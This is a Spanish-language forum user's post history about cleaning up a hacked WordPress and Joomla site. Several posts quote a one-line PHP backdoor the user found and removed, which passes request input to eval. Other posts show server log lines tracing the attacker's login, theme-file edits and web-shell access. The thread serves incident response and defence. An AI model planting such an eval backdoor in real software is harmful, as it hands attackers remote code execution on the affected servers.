Baneo a @Bryantcore y a @synthesize por no seguir las normas del juego ¬¬
Saludos
Saludos
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#3792
Desarrollo Web / Re: Mi Wordpress Hackeado
25 Julio 2014, 05:32 AM
En un principio si aunque hay que analizar el joomla por si tiene mas .. "secretos".
Dile a tu amiga que te lo pague bien xD
Saludos
Dile a tu amiga que te lo pague bien xD
Saludos
#3793
Desarrollo Web / Re: Mi Wordpress Hackeado
25 Julio 2014, 05:06 AMCitarDebo comentarlas como has hecho tu o lo estás modificando vos?
He borrado las lineas directamente.. eso no puede ser de joomla.. tiene que haber sido modificado por algun h4x0r xD
CitarIgualmente me gustaría saber como hacen para encontrar los ARCHIVOS CON LAS LÍNEAS ESAS QUE CONTIENEN "ERRORES" y que son las que debemos modificar...
Todo esta en el access-log.txt que tienes al principio cuando entras al FTP.. el problema es que ese log solo muestra lo que se ha visitado.. si el tipo ese ha metido mas en otro lado... jodido.
PD: @MinusFour, si quieres te paso el access-log ?
Saludos
#3794
Desarrollo Web / Re: Mi Wordpress Hackeado
25 Julio 2014, 05:00 AM
@MinusFour tienes razon, y estoy comenzado a sospechar que esos archivos fueron intencionadamente modificados... todos contienen la misma linea..
Saludos
Código [Seleccionar]
/peritajedearte/administrator/templates/hathor/html/com_admin/profile/edit.php?req=
/peritajedearte/tmp/install_530f47f438c16/packages/install_530f47f49d5c7/helpers/captcha/captcha.php?req=
peritajedearte/administrator/components/com_users/views/groups/view.html.php?req=
/peritajedearte/administrator/components/com_templates/helpers/template.php?req=Saludos
#3795
Desarrollo Web / Re: Mi Wordpress Hackeado
25 Julio 2014, 04:50 AM
Si se me olvido mencionarlo..
El archivo esta en
peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php
La linea uno contenía lo que puse en el post de arriba, y ahora tiene
PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD
Saludos
El archivo esta en
peritajedearte/plugins/editors/jckeditor/jckeditor/includes/ckeditor/autoload/startconfig.php
La linea uno contenía lo que puse en el post de arriba, y ahora tiene
Código (php) [Seleccionar]
<?php #$post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>PD: En teoria esta todo solucionado, aunque con tantas vulnerabilidades eso era un nido de malware xD
Saludos
#3796
Desarrollo Web / Re: Mi Wordpress Hackeado
25 Julio 2014, 04:44 AM
En el archivo litermalmente pone esto:
PD: He comentado la linea.. no debería dar mas problemas.
PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura..
Saludos
Código [Seleccionar]
<?php $post_var = "req"; if(isset($_REQUEST[$post_var])) { eval(stripslashes($_REQUEST[$post_var])); exit(); }; ?>PD: He comentado la linea.. no debería dar mas problemas.
PD2: Como sugerencia, dile a tu amiga que siempre actualice y que use una contraseña mas segura..
Saludos
#3797
Desarrollo Web / Re: Mi Wordpress Hackeado
25 Julio 2014, 04:40 AM
Efectivamente, como ha mencionado @MinusFour, ese archivo ejecuta directamente el php, es vulnerable.
Lo que si he podido aislar es el ataque..
El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces.
Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD
Estoy mirando el archivo ese de joomla.
Saludos
Lo que si he podido aislar es el ataque..
Código [Seleccionar]
176.31.251.103 - - [06/Jul/2014:21:23:24 -0300] "GET /wp-login.php HTTP/1.1" 200 2827 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:25 -0300] "POST /wp-login.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:26 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:29 -0300] "GET /wp-admin/ HTTP/1.1" 200 69338 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:31 -0300] "GET /wp-admin/theme-editor.php HTTP/1.1" 200 33381 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:32 -0300] "GET /wp-admin/theme-editor.php?file=404.php&theme=wilborada HTTP/1.1" 200 18746 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:33 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:34 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 151 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:35 -0300] "POST /wp-content/themes/wilborada/404.php HTTP/1.1" 200 47 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:36 -0300] "GET /wp-content/themes/wilborada/systemcash.php HTTP/1.1" 200 120 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:38 -0300] "POST /wp-admin/theme-editor.php HTTP/1.1" 302 - "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
176.31.251.103 - - [06/Jul/2014:21:23:39 -0300] "GET /theme-editor.php?file=404.php&theme=wilborada&scrollto=0&updated=true HTTP/1.1" 404 3 "-" "Opera/9.80 (Windows NT 6.0); U) Presto/2.10.289 Version/12.02"
El atacante obtuvo aceso logueandose, modifico el 404.php del tema, lo abrio y lo volvio a modificar. Tambien se ve el primer acceso a systemcash.php.. despues, hay entradas de bots con UA (Mozilla 3.0) que acceden a el muchisimas veces.
Todos los archivos sospechosos están borrados sin embargo (y no he sido yo) xD
Estoy mirando el archivo ese de joomla.
Saludos
#3798
Desarrollo Web / Re: Mi Wordpress Hackeado
25 Julio 2014, 04:01 AM
Lo mas raro de todo es que si estas logueado, si que puedes visualizar el tema perfectamente.. pero si no estas logueado, ves la plantilla esa...
Valeeee. Arreglado, el functions.php del tema, tenia su propio modo mantenimiento y estaba (de alguna manera) activado. @ka0s, he comentado la linea 25 del functions.php para quitar el modo mantenimiento por si lo quieres volver a poner en algun momento.
Ahora toca mirar la vulnerabilidad esa..
Saludos
Valeeee. Arreglado, el functions.php del tema, tenia su propio modo mantenimiento y estaba (de alguna manera) activado. @ka0s, he comentado la linea 25 del functions.php para quitar el modo mantenimiento por si lo quieres volver a poner en algun momento.
Ahora toca mirar la vulnerabilidad esa..
Saludos
#3799
Desarrollo Web / Re: Mi Wordpress Hackeado
25 Julio 2014, 03:50 AM
He mirrado el error-log.txt son unos 57mb y toooooooooodas las entradas son del tipo esto:
Raro xD
Saludos
Código [Seleccionar]
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Zend Optimizer requires Zend Engine API version 220060519.
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] The Zend Engine API version 220090626 which is installed, is newer.
[Thu Jul 24 22:49:07 2014] [error] [client (Una ip va aqui xD)] Contact Zend Technologies at http://www.zend.com/ for a later version of Zend Optimizer.Raro xD
Saludos
#3800
Desarrollo Web / Re: Mi Wordpress Hackeado
25 Julio 2014, 03:38 AM
Ya lo mire no tiene ninguno. Parece que lo que falla es el tema actual.. si vuelve a los defaults de Wordpress si que funciona.
Saludos
Saludos